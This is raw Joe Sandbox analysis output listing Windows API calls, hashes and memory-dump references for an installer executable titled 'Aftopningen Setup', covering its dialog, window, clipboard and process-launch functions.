                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  APIs
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                    • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                    • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                    • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                  • String ID:
                                                  • API String ID: 2972824698-0
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                  • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                  • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,6FEB1233,?,6FEB12CF,-6FEB404B,6FEB11AB,-000000A0), ref: 6FEB121D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92789234716.000000006FEB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FEB0000, based on PE: true
                                                   • Associated: 00000000.00000002.92789161524.000000006FEB0000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789295698.000000006FEB3000.00000002.00000001.01000000.00000005.sdmp
                                                   • Associated: 00000000.00000002.92789366643.000000006FEB5000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6feb0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: a68eec6213a6be78aedffe7da00236f5f326ed49f674ab24ed3fc50c9faac193
                                                  • Instruction ID: b24247958cad7187d6cfa9d114e2303738b01ba90e9a613938017bc12d081632
                                                  • Instruction Fuzzy Hash: 18A00171944900DBDE519AE08A4BA143E22AB4B721F008041E31554194866540209B26
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                  • GetClientRect.USER32(?,?), ref: 00405407
                                                  • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                  • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                  • ShowWindow.USER32(00000000), ref: 00405554
                                                  • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                  • ShowWindow.USER32(00000008), ref: 004055A1
                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                  • CreatePopupMenu.USER32 ref: 004055E6
                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055FB
                                                  • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                  • OpenClipboard.USER32(00000000), ref: 00405680
                                                  • EmptyClipboard.USER32 ref: 00405686
                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004056D1
                                                  • CloseClipboard.USER32 ref: 004056D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID:
                                                  • API String ID: 590372296-0
                                                  • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                  • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                  • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                  • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                  • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                  • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                  • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                    • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                    • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\LkzvfB4VFj.exe",75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                    • Part of subcall function 004063D2: CharPrevA.USER32(?,?,75843410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                  • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                    • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                    • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                    • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: A$C:\Users\user\tranchet$Call
                                                  • API String ID: 2624150263-612975583
                                                  • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                  • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                  • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                  • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                  • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                  • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                  • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                  • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                  • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                  • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                  • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                  • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                  • DeleteObject.GDI32(00000110), ref: 00404C81
                                                  • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                  • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                  • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                    • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                  • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                  • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                  • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                  • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                  • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                  • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                  • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                  • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                  • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                  • ShowWindow.USER32(?,00000000), ref: 00405169
                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                  • ShowWindow.USER32(00000000), ref: 0040517B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 2564846305-813528018
                                                  • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                  • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                  • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                  • ShowWindow.USER32(?), ref: 00403D00
                                                  • DestroyWindow.USER32 ref: 00403D14
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                  • GetDlgItem.USER32(?,?), ref: 00403D51
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                  • EnableWindow.USER32(?,?), ref: 00403F68
                                                  • EnableWindow.USER32(?,?), ref: 00403F83
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                  • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                  • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID:
                                                  • API String ID: 184305955-0
                                                  • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                  • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                  • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                  • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                  APIs
                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                  • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                  • GetSysColor.USER32(?), ref: 004043B4
                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                  • lstrlenA.KERNEL32(?), ref: 004043D5
                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                  • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                  • SendMessageA.USER32(00000000), ref: 0040445E
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                  • SetCursor.USER32(00000000), ref: 004044E1
                                                  • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                  • SetCursor.USER32(00000000), ref: 004044FA
                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: Call$N
                                                  • API String ID: 3103080414-3438112850
                                                  • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                  • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                  • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                  • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,Aftopningen Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                   • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: Aftopningen Setup$F
                                                  • API String ID: 941294808-62578608
                                                  • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                  • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                  • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                  • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                  APIs
